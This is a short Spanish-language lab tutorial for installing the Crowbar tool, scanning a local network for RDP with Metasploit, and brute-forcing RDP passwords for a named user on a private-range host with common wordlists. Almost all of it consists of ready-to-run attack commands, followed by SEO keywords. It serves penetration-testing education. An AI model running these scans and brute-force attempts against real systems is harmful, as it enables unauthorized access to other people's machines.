
LABORATORIO

COMANDOS PARA INSTALAR CROWAR
Código: Seleccionar todo
#sudo apt install -y crowbar
# git clone https://github.com/galkan/crowbar
# cd crowbar/
# pip3 install -r requirements.txt
Código: Seleccionar todo
sudo msfconsole
use auxiliary/scanner/rdp/rdp_scanner
show options
set RHOSTS 192.168.1.0/24 | Puede ser un Host Ejemplo 192.168.1.79/32
exploit
Código: Seleccionar todo
## sudo crowbar -b rdp -s 192.168.1.79/32 -u roger -C /usr/share/nmap/nselib/data/passwords.lst
## sudo crowbar -b rdp -s 192.168.1.79/32 -u roger -C /usr/share/nmap/nselib/data/passwords.lst --v
## sudo crowbar -b rdp -s 192.168.1.79/32 -u roger -C /usr/share/nmap/nselib/data/passwords.lst --q
Código: Seleccionar todo
cd crowbar
sudo ./crowbar.py --server 192.168.1.79/32 -b rdp -u roger -C /usr/share/nmap/nselib/data/passwords.lst
sudo ./crowbar.py -b rdp -s 192.168.1.79/32 -u roger -C /usr/share/nmap/nselib/data/passwords.lst
Código: Seleccionar todo
iconv -f ISO-8859-1 -t latin-1 /usr/share/nmap/nselib/data/passwords.lst > passwords_utf8.lst
iconv -f ISO-8859-1 -t latin-1 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt
iconv -f ISO-8859-1 -t UTF-8 rockyou.txt > rockyou_utf8.txt
Página Oficial de Crowbar
https://github.com/galkan/crowbar
ehtical hacking,ethical hacker,protocolo,cyber seguridad,security,install,instalar,linux,unix,brute forcing tool,penetration tests,herramienta,debian,ubuntu,synology,python,xpenology,tutorial,linux for ethical hackers,cursos,courses,capacitacion,educacion,How Hackers Do It,proteger computadoras,Information Systems Security Professional,CompTIA Security+,servers,servidores,educación,auditoria,ccna,escaneo,scanner,Detección de intrusiones en la red,vulnerabilidades,userland